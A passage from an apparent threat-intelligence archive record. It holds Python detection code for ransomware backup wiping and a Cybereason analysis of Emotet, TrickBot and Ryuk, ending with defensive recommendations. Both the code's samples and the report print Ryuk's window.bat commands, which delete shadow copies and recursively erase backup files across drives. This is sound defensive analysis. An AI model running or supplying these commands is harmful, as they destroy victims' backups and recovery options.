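        if switches >= {'/s', '/q'} and (exts or named):
            tags.append(('backup_delete', 'recursive quiet delete of ' + ', '.join(exts or ['backup*'])))
    return tags


def assess_script(lines):
    # Aggregate findings for a script or a burst of command lines from one
    # process tree. Shadow-copy removal combined with backup-file deletion is
    # the high-confidence signal; either alone is medium.
    tags = {}
    for line in lines:
        for tag, detail in classify_command(line):
            tags.setdefault(tag, []).append(detail)
    if 'vss_delete' in tags and 'backup_delete' in tags:
        severity = 'high'
    elif tags:
        severity = 'medium'
    else:
        severity = 'none'
    return {'severity': severity, 'tags': tags}


# Constructed sample: the shape of window.bat (one volume shown) plus benign lines.
SAMPLE_SCRIPT = [
    'vssadmin Delete Shadows /all /quiet',
    'vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB',
    'vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded',
    r'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set',
    'del %0',
]
BENIGN_LINES = ['vssadmin list shadows', 'del /q C:/temp/report.tmp',
                'vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded']

if __name__ == '__main__':
    print(assess_script(SAMPLE_SCRIPT))
    print(assess_script(BENIGN_LINES))
```

Because del is a cmd.exe builtin, the deletion lines only appear in process-creation telemetry as the cmd.exe invocation of the batch file; feed the rule the script contents (or script-block logging) as well as command lines, as assess_script does here.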
Deleting the shadow copies ensures that the victim is forced to pay to recover valuable files, since they can be neither decrypted nor restored from VSS. Note the pattern in the script below: besides the explicit Delete Shadows calls, each volume's shadow storage is resized down to 401MB, which forces Windows to discard existing shadow copies to fit the new limit, and then back to unbounded.\r\nThe window.bat script spawns vssadmin commands, as shown in the Cybereason Platform.\r\nThe contents of window.bat:\r\nvssadmin Delete Shadows /all /quiet\r\nvssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded\r\nvssadmin Delete Shadows /all /quiet\r\ndel /s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.w\r\ndel /s /f /q d:\\*.VHD d:\\*.bac d:\\*.bak d:\\*.wbcat d:\\*.bkf d:\\Backup*.* d:\\backup*.* d:\\*.set d:\\*.w\r\ndel /s /f /q e:\\*.VHD e:\\*.bac e:\\*.bak e:\\*.wbcat e:\\*.bkf e:\\Backup*.* e:\\backup*.* e:\\*.set e:\\*.w\r\ndel /s /f /q f:\\*.VHD f:\\*.bac f:\\*.bak f:\\*.wbcat f:\\*.bkf f:\\Backup*.* f:\\backup*.* f:\\*.set f:\\*.w\r\ndel /s /f /q g:\\*.VHD g:\\*.bac g:\\*.bak g:\\*.wbcat g:\\*.bkf g:\\Backup*.* g:\\backup*.* g:\\*.set g:\\*.w\r\ndel /s /f /q h:\\*.VHD h:\\*.bac h:\\*.bak h:\\*.wbcat h:\\*.bkf h:\\Backup*.* h:\\backup*.* h:\\*.set h:\\*.w\r\ndel %0\r\nThe Cybereason Platform was able to raise an alert thanks to the suspicious behavior of the injected taskhost.exe. \r\nAn alert for ransomware in the Cybereason Platform. \r\nRyuk encrypts files on the disk and changes their extension to .RYK.\r\nRyuk changing the extensions of the files to .RYK.\r\nRyuk drops a ransom note, RyukReadMe.txt, created with notepad.exe in every processed folder. \r\nThe creation of the ransom note. \r\nThe contents of the Ryuk ransom note. \r\nConclusion\r\nTrickBot is classified as a banking trojan, but the banking-related capability is just one of its many abilities. TrickBot is able to communicate with a C2 server and to collect and exfiltrate sensitive data ranging from banking credentials to usernames, passwords, and personal data. An attacker with this information can easily destroy trust in a business, wreck the reputation of a brand, or compromise individuals and cost companies money.\r\nOnce Ryuk is deployed, it encrypts files and is spread through the network to infect more machines. This increases the damage and the likelihood that the victim will be willing to pay the ransom. This threat, due to its advanced capabilities and spreading ability, can cause a great deal of damage to an organization, from loss of money to brand degradation.\r\nOur customers were able to use the remediation tool of the Cybereason Platform to immediately stop the exfiltration and prevent future execution of these kinds of malicious files in the organization. Cybereason’s Active Monitoring team and Hunting team were able to detect both the malicious file related to TrickBot and the operations and modules used to perform its activity. 
This includes reconnaissance, credential harvesting and spreading using the PowerShell Empire framework, mimikatz, and EternalBlue. All of these activities work to distribute and deliver an additional payload, in this instance the Ryuk ransomware.\r\nResearch by Noa Pinkas, Lior Rochberger, and Matan Zatz\r\nCybereason’s Active Monitoring and Hunting teams have uncovered a severe threat that uses the Emotet trojan and the TrickBot trojan to deliver the Ryuk ransomware. During the past few weeks, the Cybereason Active Monitoring team has encountered multiple incidents of attempted TrickBot infection. Among these incidents and investigations, the team observed Ryuk ransomware infection attempts as well. The Ryuk deployment and execution tactics, techniques, and procedures can vary across incidents. However, the Cybereason Active Monitoring team was able to identify that machines infected with TrickBot were susceptible to a later infection with Ryuk.\r\nThough TrickBot is known as a banking trojan, in this campaign its banking capabilities are only one of many abilities. In this instance, it is able to communicate with a C2 server to collect and exfiltrate a range of sensitive data. It is also used to stage the deployment of the Ryuk ransomware, which encrypts files throughout the network and increases the damage to the end user. 
These threats result in brand degradation, damage to an organization, and damage to the individual.\r\nSecurity Recommendations\r\nEducate your team on how to correctly handle suspicious emails to prevent the initial download or dropping of malware.\r\nTo protect against lateral movement, do not use privileged accounts for everyday work, log off RDP sessions rather than leaving them disconnected (a disconnected session keeps the user's credentials in memory on the remote host), do not store passwords in plain text, deploy good authentication practices, disable unnecessary shares, and review the administrative shares used in your organization.\r\nMake sure your systems are patched, especially against CVE-2017-0144 (EternalBlue), to prevent the propagation of TrickBot and other malware.\r\nDisable macros across the environment.\r\nFollow Microsoft’s security advisory on improving credential protection and management in your organization, including disabling WDigest credential caching.\r\nProactively approach security by performing hunts and searching for suspicious behavior before an incident starts.\r\nRemove any persistence mechanisms that may have been used by any of the malware mentioned here (the TrickBot scheduled task and service, and the Ryuk Run key) in order to mitigate the threat.\r\nSource: https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware"
	],
	"report_names": [
		"triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434346,
	"ts_updated_at": 1775791331,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d79bac860935bbf5d287f96651e5d0b5b59e4b7e.pdf",
		"text": "https://archive.orkl.eu/d79bac860935bbf5d287f96651e5d0b5b59e4b7e.txt",
		"img": "https://archive.orkl.eu/d79bac860935bbf5d287f96651e5d0b5b59e4b7e.jpg"
	}
}